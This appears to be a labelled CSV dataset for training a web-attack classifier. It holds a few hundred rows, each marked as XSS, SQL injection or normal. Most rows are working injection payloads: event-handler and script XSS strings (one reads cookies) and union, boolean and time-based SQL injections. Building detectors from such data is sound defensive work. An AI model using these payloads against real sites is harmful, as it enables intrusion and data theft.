File size: 96,015 Bytes
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1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 |
"{""id"":null,""firstName"":""Bang Joni"",""lastName"":""Janggut"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27169
"<style>:target {color: red;}</style><wbr id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></wbr>",1,XSS,1086
"-3270"" where 2144 = 2144 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10669
<strike onpointerenter=alert(1)>XSS</strike>,1,XSS,6980
"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28",2,SQLi,13655
"1%' ) ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15438
"<isindex onmouseenter=""alert(1)"">test</isindex>",1,XSS,6205
"1%"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""%"" = """,2,SQLi,12946
Select the best tools for the project.,3,normal,24217
"<svg onclick=""alert(1)"">test</svg>",1,XSS,9201
"<font oncontextmenu=""alert(1)"">test</font>",1,XSS,7345
<BR SIZE="&{alert('XSS')}">,1,XSS,4001
"<strong onbeforepaste=""alert(1)"" contenteditable>test</strong>",1,XSS,3232
select ( case when ( 2350 = 8682 ) then 2350 else 1/ ( select 0 ) end ) --,2,SQLi,15755
"-8344 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) -- wjpa",2,SQLi,10593
select case when 2095 = 9074 then 1 else null end--,2,SQLi,18352
"<li draggable=""true"" ondragleave=""alert(1)"">test</li>",1,XSS,4902
-4308' ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'jmot' = 'jmot,2,SQLi,10630
<p onpointerdown=alert(1)>XSS</p>,1,XSS,9383
"1"" ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15518
declare @s varchar ( 8000 ) select @s = 0x73656c65637420404076657273696f6e,2,SQLi,15704
"-4477' ) ) union all select 8444,8444,8444,8444,8444,8444,8444,8444--",2,SQLi,16340
"-3315"" ) ) ) union all select 2457,2457,2457,2457,2457,2457--",2,SQLi,17036
1' ) ) ) and 7401 = 9838#,2,SQLi,21121
Where's the nature reserve?,3,normal,23596
"select * from users where id = 1 -1<@ union select 1,version ( ) -- 1",2,SQLi,16259
"1' ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( 'cpoy' = 'cpoy",2,SQLi,13123
"AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337",2,SQLi,16652
"1' ) as hvyx where 3194 = 3194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11097
"1"" ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""tzog"" like ""tzog",2,SQLi,12445
"<big draggable=""true"" ondrag=""alert(1)"">test</big>",1,XSS,5627
"-8477' union all select 2517,2517,2517--",2,SQLi,19550
<button onCellChange=javascript:alert(1)>,1,XSS,7796
1 ) ) and 3228 = 7376#,2,SQLi,21440
a' or 3 = 3--,2,SQLi,22269
"exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 1049 = 1049,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,13117
"-7306"" or 2081 = 6847",2,SQLi,21674
1 ) as jqbp where 5407 = 5407 and 4595 = 4595#,2,SQLi,18922
"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><i id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></i>",1,XSS,302
I want to select a movie to watch tonight.,3,normal,23969
<abbr onblur=alert(1) tabindex=1 id=x></abbr><input autofocus>,1,XSS,3210
"select count ( * ) from generate_series ( 1,5000000 ) and ( ( ( 'xori' like 'xori",2,SQLi,15132
"<ul onkeydown=""alert(1)"" contenteditable>test</ul>",1,XSS,5549
"-2982' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'iqwn' = 'iqwn",2,SQLi,10301
-4494 or 5291 = 4452,2,SQLi,21781
"1 ) ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13860
<wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus>,1,XSS,2918
"1"" ) as ltoa where 9159 = 9159 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11887
"1'+ ( select unzl where 3432 = 3432 union all select null,null,null,null--",2,SQLi,15729
"<;HEAD>;<;META HTTP-EQUIV="";CONTENT-TYPE""; CONTENT="";text/html; charset=UTF-7"";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-",1,XSS,519
"or sleep(5)=""",2,SQLi,22254
"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29",2,SQLi,13482
"1"" ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""uglh"" like ""uglh",2,SQLi,12307
Order a classic burger.,3,normal,22649
"-7700%' ) union all select 5660,5660,5660,5660,5660,5660,5660,5660,5660#",2,SQLi,15975
"In 18 3 a select committee of the House of Commons went into the whole subject of secondary punishment and reported that, as the difficulties in the way of an effective classification of prisoners were insurmountable, they were strongly in favour of the confinement of prisoners in separate cells, recommending that the whole of the prisons should be altered accordingly and the expense borne by the public exchequer.",3,normal,26029
"{""id"":null,""firstName"":"""",""lastName"":""Brolagda"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26951
1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,18755
"1%"" ) ) ) union all select null,null,null,null,null,null,null--",2,SQLi,16858
"select * from users where id = 1 or \+<$ union select 1,@@VERSION -- 1",2,SQLi,16131
"-2667 ) union all select 5848,5848,5848,5848--",2,SQLi,18942
"1"" ) where 3727 = 3727 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10287
1' ) ) ) and 7533 = 7533 and ( ( ( 'txex' = 'txex,2,SQLi,18623
"1"" ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ""wvkp"" like ""wvkp",2,SQLi,12393
<input onpointerup=alert(1)>XSS</input>,1,XSS,8124
"1' ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 'bvdw' = 'bvdw",2,SQLi,10792
Select awe.,3,normal,24735
"1' ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 )",2,SQLi,11926
<input3 onpointerout=alert(1)>XSS</input3>,1,XSS,7356
Filter spam calls.,3,normal,22781
-9668' ) ) as orfu where 5822 = 5822 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10421
"1"" union all select null,null,null,null,null,null,null--",2,SQLi,17738
"1' ) as idqc where 5288 = 5288 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,16348
"<template draggable=""true"" ondrag=""alert(1)"">test</template>",1,XSS,3494
-8007' ) ) as bgpp where 9555 = 9555 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,9956
"1"" ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""qyew"" = ""qyew",2,SQLi,12608
<svg><a xmlns:xlink= xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>,1,XSS,484
Where's the townhouse?,3,normal,23565
"-3513%"" union all select 8473,8473#",2,SQLi,20026
"1"" ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16396
<content id=x tabindex=1 onbeforeactivate=alert(1)></content>,1,XSS,3337
"<hgroup onmousemove=""alert(1)"">test</hgroup>",1,XSS,6962
"1' union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,16100
"<body background=javascript:'""><script>alert(navigator.userAgent)</script>></body>",1,XSS,1923
<label id=x tabindex=1 onbeforeactivate=alert(1)></label>,1,XSS,4155
1'+ ( select shec where 3589 = 3589 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ) +',2,SQLi,14828
"If you want a more detailed explanation of the process, select the button labeled ""Learn More"" and press X. When you're ready to set up two-step verification, select ""Set Up Now"" and press X.",3,normal,26048
"1%"" ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13471
1 ) ) as xzcl where 2332 = 2332,2,SQLi,20466
"<output onpaste=""alert(1)"" contenteditable>test</output>",1,XSS,4395
"<s onkeyup=""alert(1)"" contenteditable>test</s>",1,XSS,6409
"<style>:target {transform: rotate(180deg);}</style><nextid id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></nextid>",1,XSS,586
"<frameset draggable=""true"" ondragend=""alert(1)"">test</frameset>",1,XSS,3106
"1' ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and 'fsvr' = 'fsvr",2,SQLi,10525
As they're offering up to 43% off select Delsey Paris luggage.,3,normal,26351
1 ) ) as qgma where 7675 = 7675 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,14749
"<plaintext onclick=""alert(1)"">test</plaintext>",1,XSS,6475
Select a password that's secure.,3,normal,24213
<input onfocus=write(XSS) autofocus>,1,XSS,8767
"<content onmousedown=""alert(1)"">test</content>",1,XSS,6330
"1'|| ( select 'txyy' where 6500 = 6500 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) ) ||'",2,SQLi,11939
"<figcaption onmouseover=""alert(1)"">test</figcaption>",1,XSS,5109
1' where 2913 = 2913 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,15416
"-5763' ) ) ) union all select 1640,1640,1640,1640,1640,1640,1640,1640,1640,1640#",2,SQLi,15228
<shadow onpointermove=alert(1)>XSS</shadow>,1,XSS,7207
"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )",2,SQLi,10911
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--",2,SQLi,18653
"1 ) where 1559 = 1559 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,12598
Select a type of scatter plot required then click the Define button.,3,normal,25658
"<address ondblclick=""alert(1)"">test</address>",1,XSS,6726
"select * from generate_series ( 9167,9167,case when ( 9167 = 2273 ) then 1 else 0 end ) limit 1--",2,SQLi,14282
"waitfor delay '0:0:5' and ( ( ( ""mfro"" like ""mfro",2,SQLi,18562
"1"" where 1831 = 1831 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,15506
"<small onkeydown=""alert(1)"" contenteditable>test</small>",1,XSS,4346
"<dl onkeyup=""alert(1)"" contenteditable>test</dl>",1,XSS,5984
1' ) ) ) waitfor delay '0:0:5' and ( ( ( 'wvzb' = 'wvzb,2,SQLi,17844
"<strong onclick=""alert(1)"">test</strong>",1,XSS,8000
"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30",2,SQLi,12316
"-9829' ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11694
<button autofocus onfocus=alert(1)>test</button>,1,XSS,6053
"1' ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( 'cwjd' = 'cwjd",2,SQLi,16811
1'|| ( select 'fven' where 1433 = 1433 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ) ||',2,SQLi,12109
1%' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( '%' = ',2,SQLi,15505
I'll select a movie for us to watch together.,3,normal,23821
Select your exchange.,3,normal,25050
"<image onkeypress=""alert(1)"" contenteditable>test</image>",1,XSS,4145
"1%' ) union all select null,null,null,null--",2,SQLi,19140
( select * from ( select ( sleep ( 5 ) ) ) srmq ) and 'fdgq' = 'fdgq,2,SQLi,16380
"( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,17559
"<ins onmouseleave=""alert(1)"">test</ins>",1,XSS,8273
<div onblur=alert(1) tabindex=1 id=x></div><input autofocus>,1,XSS,3572
"-7531' ) ) ) union all select 6900,6900,6900,6900,6900,6900,6900,6900,6900#",2,SQLi,15645
"1 ) as wvpl where 9791 = 9791 and make_set ( 3491 = 9067,9067 ) --",2,SQLi,16606
Select an option.,3,normal,24815
"{""id"":null,""firstName"":""Ivy"",""lastName"":""Lim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27196
"1%"" ) ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15449
1' ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( 'fuvv' = 'fuvv,2,SQLi,16055
<center onblur=alert(1) tabindex=1 id=x></center><input autofocus>,1,XSS,2760
"1"" ) ) and ( 1248 = 8705 ) *8705 and ( ( ""wvma"" like ""wvma",2,SQLi,17389
"<style>@keyframes x{}</style><small style=""animation-name:x"" onanimationstart=""alert(1)""></small>",1,XSS,1559
<img/src=`%00` onerror=this.onerror=confirm(1),1,XSS,6273
"{""id"":null,""firstName"":""Horace"",""lastName"":""Hutapea"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26756
"1' ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( 'vkde' = 'vkde",2,SQLi,12663
1' ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( 'lajk' = 'lajk,2,SQLi,14822
"select * from users where id = 1 or ""$#"" or 1 = 1 -- 1",2,SQLi,17896
"<blockquote ondblclick=""alert(1)"">test</blockquote>",1,XSS,5487
"select * from users where id = 1. union select null,banner from v$version where rownum = 1 -- 1",2,SQLi,14384
<colgroup onpointerleave=alert(1)>XSS</colgroup>,1,XSS,5902
"select * from users where id = '1' + ( \ ) union select 1,@@VERSION -- 1'",2,SQLi,15842
"1%' ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( '%' = '",2,SQLi,12038
"An English translation of the embassy to Constantinople is in Ernest Henderson's Select Documents of the Middle Ages (Bohn series, 1896).",3,normal,26376
1%' or sleep ( 5 ) and '%' = ',2,SQLi,20543
"1 ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( 4510 = 4510",2,SQLi,12481
"make_set ( 6174 = 9734,1 )",2,SQLi,20986
select * from users where id = 1 + ( 1 ) or 1 = 1 -- 1,2,SQLi,17891
"-2790' ) as xhct where 5756 = 5756 union all select 5756,5756#",2,SQLi,16973
"1%"" ) or 4915 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13702
"<source oncontextmenu=""alert(1)"">test</source>",1,XSS,6496
-2036' ) or ( 8459 = 8459 ) *4906 and ( 'hjeu' = 'hjeu,2,SQLi,18017
"1' and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and 'lywy' like 'lywy",2,SQLi,11001
"<frameset draggable=""true"" ondragenter=""alert(1)"">test</frameset>",1,XSS,2832
"<blink ondblclick=""alert(1)"">test</blink>",1,XSS,7711
"<div draggable=""true"" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby>",1,XSS,1099
"<a href=""javas\x03cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2410
1' ) where 2090 = 2090,2,SQLi,21432
or 'something' like 'some%',2,SQLi,20862
<x oncut=alert(1)>cut this!,1,XSS,9656
"1 ) where 2044 = 2044 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,17254
"<rt onmouseenter=""alert(1)"">test</rt>",1,XSS,8661
"{""id"":null,""firstName"":""Lay Sien"",""lastName"":""Ong"",""address"":"" Dhoby Ghaut Mrt Station, 11 Orchard Road"",""city"":""58"",""telephone"":""1356410966""}",3,normal,26975
"<div id=""98""><div id=d><div style=""font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'"">X</div></div>",1,XSS,1305
<figure id=x tabindex=1 onactivate=alert(1)></figure>,1,XSS,4923
1'|| ( select 'agng' from dual where 3337 = 3337 rlike sleep ( 5 ) ) ||',2,SQLi,15981
"1' ) and elt ( 1407 = 6365,6365 ) and ( 'zckl' = 'zckl",2,SQLi,17993
"Outside of that promotion, the Select tier is usually $15.99.",3,normal,25800
"A range of intelligence will be used to select the LAs, including evidence from the subnational population projections.",3,normal,26437
"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ""%"" = """,2,SQLi,14989
1 ) as gfhf where 5804 = 5804 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,15355
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>,1,XSS,1871
"1 union all select null,null,null,null,null,null,null--",2,SQLi,17831
<img src= onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #,1,XSS,845
"select count ( * ) from generate_series ( 1,5000000 ) and 'dfwj' = 'dfwj",2,SQLi,15961
"<script src=""""></script>",1,XSS,3248
"-1368 ) ) union all select 1310,1310,1310,1310,1310#",2,SQLi,18224
"select * from users where id = 1 + ( \+ ) union select null,@@VERSION -- 1",2,SQLi,15700
"1"" ) as ztkr where 1532 = 1532",2,SQLi,20522
<cite onfocusout=alert(1) tabindex=1 id=x></cite><input autofocus>,1,XSS,2753
"<section onmouseup=""alert(1)"">test</section>",1,XSS,6968
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((1337"" LIKE ""1337",2,SQLi,16249
<script x> alert(1) </script 1=2,1,XSS,9406
"<param onbeforepaste=""alert(1)"" contenteditable>test</param>",1,XSS,3524
"<style>@keyframes slidein {}</style><template style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></template>",1,XSS,317
"<footer onmouseleave=""alert(1)"">test</footer>",1,XSS,6708
"<IMG SRC=x onkeydown=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3440
AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,18151
or 3=3,2,SQLi,22532
"<body draggable=""true"" ondragenter=""alert(1)"">test</body>",1,XSS,4046
<svg><element onload=alert(1)></element>,1,XSS,8026
"{""id"":null,""firstName"":""Linda"",""lastName"":""Chong"",""address"":""25 Minters Chapel Rd #9"",""city"":""575"",""telephone"":""2417450621""}",3,normal,27143
"<SCRIPT/XSS SRC=""""></SCRIPT>",1,XSS,5290
<video><source onerror=alert(1) src=1></video>,1,XSS,6396
"1'+ ( select zpns where 6922 = 6922 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) +'",2,SQLi,10905
"make_set ( 2672 = 2672,5440 )",2,SQLi,20715
1' ) ) as dckd where 1794 = 1794,2,SQLi,20263
<button seekSegmentTime=javascript:alert(1)>,1,XSS,7051
"1"" ) ) as dooi where 1806 = 1806 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12052
"<style>:target {color:red;}</style><shadow id=x style=""transition:color 1s"" ontransitionend=alert(1)></shadow>",1,XSS,1031
"<set attributeName=""xlink:href"" begin=""accessKey(c)"" to=""//"" />",1,XSS,2154
"<label onmouseout=""alert(1)"">test</label>",1,XSS,7642
"1"" where 7022 = 7022",2,SQLi,21806
"-6236' ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11701
"<style>@keyframes slidein {}</style><em style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></em>",1,XSS,453
<th id=x tabindex=1 onbeforeactivate=alert(1)></th>,1,XSS,5359
Let's decide where to go for a relaxing day.,3,normal,23938
"<ul draggable=""true"" ondragleave=""alert(1)"">test</ul>",1,XSS,4934
"<style onLoad style onLoad=""javascript:javascript:alert(1)""></style onLoad>",1,XSS,2209
"1"" ) ) as ycvh where 4523 = 4523 and sleep ( 5 ) #",2,SQLi,18501
<i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus>,1,XSS,3584
"-9352"" ) ) ) or 3038 = 3038",2,SQLi,20879
"-7812' ) or 5023 = ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'ttvo' = 'ttvo",2,SQLi,10346
I'm considering where to have a peaceful retreat.,3,normal,23898
Where's the spa?,3,normal,23617
"<img src\x13=x onerror=""javascript:alert(1)"">",1,XSS,6537
"<style>@keyframes x{}</style><ol style=""animation-name:x"" onanimationend=""alert(1)""></ol>",1,XSS,1785
"<BR SIZE=""&{javascript:alert(1)}"">",1,XSS,9164
"1'+ ( select 'gjaq' where 5449 = 5449 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) ) +'",2,SQLi,11490
"-5945' ) ) ) union all select 4266,4266,4266,4266,4266--",2,SQLi,17637
Order pizza.,3,normal,23023
-4557 or 6872 = 6872-- kkte,2,SQLi,20875
"<figure onmouseout=""alert(1)"">test</figure>",1,XSS,7104
"-9574' ) as rxym where 4719 = 4719 union all select 4719,4719,4719,4719,4719,4719,4719--",2,SQLi,14781
